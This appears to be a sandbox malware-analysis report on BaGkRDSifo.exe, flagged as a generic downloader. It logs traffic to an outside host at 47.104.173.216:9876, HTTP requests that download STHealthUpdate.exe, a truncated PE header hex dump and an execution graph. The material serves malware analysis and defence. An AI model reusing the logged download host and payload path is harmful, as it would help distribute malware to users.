            May 27, 2024 15:23:02.429507971 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.429609060 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.429642916 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.429660082 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.429678917 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.429686069 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.484610081 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.656200886 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.656250000 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.656265020 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.656280041 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.656297922 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.656313896 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.656331062 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.656403065 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.656934977 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.656985998 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.656987906 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.657022953 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.657057047 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.657066107 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.657092094 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.657138109 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.657808065 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.657841921 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.657877922 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.657895088 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.703387022 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.754442930 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.797138929 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.883873940 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.883924961 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.883955956 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.883990049 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.883995056 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.884026051 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.884035110 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.884059906 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.884094000 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.884134054 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.884668112 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.884721994 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.884797096 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.884830952 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.884865999 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.884885073 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.884900093 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.884934902 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.884943962 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.885628939 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.885684013 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.885685921 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.885715961 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.885754108 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.885840893 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.886332035 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.886365891 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.886384010 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.886400938 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.886434078 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:02.886451006 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:02.937767029 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.144804001 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.144853115 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.144891977 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.144926071 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.145127058 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.145159960 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.145181894 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.145195961 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.145246983 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.145317078 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.145350933 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.145382881 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.145397902 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.145421028 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.145472050 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.145910978 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.145945072 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.145978928 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.146002054 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.146013975 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.146064997 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.146147013 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.146197081 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.146248102 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.146255016 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.146281958 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.146313906 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.146337986 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.146348000 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.146380901 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.146394014 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.148017883 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.148051023 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.148085117 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.148087978 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.148117065 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.148132086 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.148150921 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.148183107 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.148196936 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.148216009 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.148272038 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.149224997 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.149440050 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.149583101 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.400639057 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.400685072 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.400713921 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.400732040 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.400752068 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.400755882 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.400774002 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.400789976 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.400798082 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.400806904 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.400820971 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.400825024 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.400861025 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.401025057 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.401078939 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.401082993 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.401099920 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.401144981 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.401169062 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.401372910 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.401390076 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.401406050 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.401422024 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.401422024 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.401439905 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.401458025 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.401487112 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.401978016 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402017117 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402076960 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.402117968 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402132988 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402148008 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402164936 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402180910 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.402183056 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402199030 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402214050 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.402247906 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.402895927 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402910948 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402929068 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402952909 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402961969 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.402970076 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.402983904 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.403001070 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.403003931 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.403017998 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.403022051 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.403033972 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.403068066 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.403809071 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.403860092 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.403920889 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.403938055 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.403954983 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.403978109 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.403995037 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.403996944 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.404012918 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.404027939 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.404027939 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.404045105 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.404057026 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.404093981 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.404872894 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.405003071 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.405019045 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.405035019 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.405050993 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.405056953 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.405071974 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.405076981 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.405093908 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.405108929 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.405123949 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.405124903 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.405170918 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.406582117 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.406645060 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.622528076 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.622566938 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.622584105 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.622600079 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.622617960 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.622625113 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.622634888 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.622652054 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.622663021 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.622669935 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.622680902 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.622720003 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.623059034 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623085976 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623102903 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623132944 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.623182058 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623229027 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.623334885 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623408079 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623424053 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623450994 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.623460054 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623483896 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623501062 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.623502016 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623517036 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623533964 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623545885 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.623549938 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.623584986 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.624005079 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624059916 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.624062061 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624097109 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624131918 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624145985 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.624165058 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624214888 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.624391079 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624452114 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624499083 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.624504089 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624538898 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624572039 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624584913 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.624608040 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624640942 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624653101 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.624675035 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624708891 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624721050 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.624743938 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624838114 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.624845982 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.625296116 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.625346899 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.625351906 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.625403881 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.625457048 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.625457048 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.625507116 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.625541925 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.625555038 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.625575066 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.625608921 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.625622988 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.625643015 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.625678062 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.625694990 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.625714064 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.625763893 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.626218081 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.626271009 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.626319885 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.626322031 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.626357079 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.626389027 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.626401901 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.626425028 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.626454115 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.626470089 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.627564907 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.627619982 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.627623081 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.627654076 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.627688885 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.627701044 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.627758980 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.627811909 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.627811909 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.627846003 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.627893925 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.627899885 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.627933979 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.627968073 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.627979994 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.628000021 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.628034115 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.628057957 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.628066063 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.628101110 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.628113031 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.628135920 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.628180981 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:23:03.628684998 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:23:03.672128916 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:24:43.641977072 CEST497019876192.168.2.747.104.173.216
            May 27, 2024 15:24:43.826262951 CEST98764970147.104.173.216192.168.2.7
            May 27, 2024 15:24:43.826323032 CEST497019876192.168.2.747.104.173.216
            TimestampSource IPDest IPChecksumCodeType
            May 27, 2024 15:23:00.388600111 CEST192.168.2.747.104.173.2164d5aEcho
            May 27, 2024 15:23:00.568905115 CEST47.104.173.216192.168.2.7555aEcho Reply
            • 47.104.173.216:9876
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.74970147.104.173.2169876180C:\Users\user\Desktop\BaGkRDSifo.exe
            TimestampBytes transferredDirectionData
            May 27, 2024 15:23:00.637504101 CEST79OUTGET /server.txt HTTP/1.1
            Host: 47.104.173.216:9876
            Connection: Keep-Alive
            May 27, 2024 15:23:01.572685003 CEST259INHTTP/1.1 200 OK
            Content-Type: text/plain
            Last-Modified: Mon, 27 May 2024 11:11:23 GMT
            Accept-Ranges: bytes
            ETag: "b1415f9c26b0da1:0"
            Server: Microsoft-IIS/7.5
            X-Powered-By: ASP.NET
            Date: Mon, 27 May 2024 13:23:01 GMT
            Content-Length: 12
            Data Raw: 33 2e 32 34 2e 30 35 2e 32 37 2e 35
            Data Ascii: 3.24.05.27.5
            May 27, 2024 15:23:01.644777060 CEST63OUTGET /STHealthUpdate.exe HTTP/1.1
            Host: 47.104.173.216:9876
            May 27, 2024 15:23:01.973798037 CEST1236INHTTP/1.1 200 OK
            Content-Type: application/octet-stream
            Last-Modified: Mon, 27 May 2024 11:10:41 GMT
            Accept-Ranges: bytes
            ETag: "f599508326b0da1:0"
            Server: Microsoft-IIS/7.5
            X-Powered-By: ASP.NET
            Date: Mon, 27 May 2024 13:23:01 GMT
            Content-Length: 243200
            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 10 84 2d 2c 71 ea 7e 2c 71 ea 7e 2c 71 ea 7e 32 23 7f 7e 3f 71 ea 7e 0b b7 91 7e 2b 71 ea 7e 2c 71 eb 7e 5c 71 ea 7e 32 23 6e 7e 1c 71 ea 7e 32 23 69 7e a2 71 ea 7e 32 23 7b 7e 2d 71 ea 7e 52 69 63 68 2c 71 ea 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dd 69 54 66 00 00 00 00 50 45 00 00 4c 01 04 00 74 a5 00 50 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 98 01 00 00 1a 02 00 00 00 00 00 2f cd 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 fb 3b 02 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$h-,q~,q~,q~2#~?q~~+q~,q~\q~2#n~q~2#i~q~2#{~-q~Rich,q~iTfPELtP#/@;P`@.text `.rdatamn@@.data0 @.rsrc` @@


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Target ID:0
            Start time:09:22:57
            Start date:27/05/2024
            Path:C:\Users\user\Desktop\BaGkRDSifo.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\BaGkRDSifo.exe"
            Imagebase:0x400000
            File size:3'972'096 bytes
            MD5 hash:3B8F605388479CD9296E0BE1EA9D1F60
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            Reputation:low
            Has exited:false

            Reset < >

              Execution Graph

              Execution Coverage:13.3%
              Dynamic/Decrypted Code Coverage:86.5%
              Signature Coverage:7%
              Total number of Nodes:1227
              Total number of Limit Nodes:92
              execution_graph 95382 244d104 95383 244d11c 95382->95383 95384 244d176 95383->95384 95386 5a30ad4 5 API calls 95383->95386 95390 a3009d0 95383->95390 95396 5a31ea8 95383->95396 95400 5a32c0f 95383->95400 95409 5a31e9b 95383->95409 95386->95384 95392 a300939 95390->95392 95393 a3009db 95390->95393 95391 a300a1d 95391->95384 95392->95384 95393->95391 95413 6aca1c0 95393->95413 95416 a3019d9 95393->95416 95397 5a31ece 95396->95397 95398 5a30ad4 5 API calls 95397->95398 95399 5a31eef 95398->95399 95399->95384 95401 5a32c1a 95400->95401 95402 5a32c79 95401->95402 95404 5a32c69 95401->95404 95403 5a30bfc 5 API calls 95402->95403 95405 5a32c77 95403->95405 95404->95405 95406 b33de77 3 API calls 95404->95406 95407 a3002b8 5 API calls 95404->95407 95408 a3002c8 5 API calls 95404->95408 95406->95405 95407->95405 95408->95405 95410 5a31ece 95409->95410 95411 5a30ad4 5 API calls 95410->95411 95412 5a31eef 95411->95412 95412->95384 95421 6ac5fe0 95413->95421 95415 6aca1d5 95415->95391 95417 a3019de 95416->95417 95432 a3036a7 95417->95432 95436 a3036b8 95417->95436 95418 a301c9a 95423 6ac5ff3 95421->95423 95422 6ac6010 95422->95415 95423->95422 95424 6ac6034 95423->95424 95428 6ac60e8 2 API calls 95423->95428 95429 6acf208 2 API calls 95423->95429 95430 6ac60db 2 API calls 95423->95430 95431 6acf1f7 2 API calls 95423->95431 95425 6ac6044 95424->95425 95426 6aca1e8 2 API calls 95424->95426 95427 6aca1d7 2 API calls 95424->95427 95425->95415 95426->95425 95427->95425 95428->95424 95429->95424 95430->95424 95431->95424 95433 a3036b5 95432->95433 95434 a30370c GetForegroundWindow 95433->95434 95435 a303734 95434->95435 95435->95418 95437 a3036fe 95436->95437 95438 a30370c GetForegroundWindow 95437->95438 95439 a303734 95438->95439 95439->95418 95666 a3009b0 95667 a3009bb 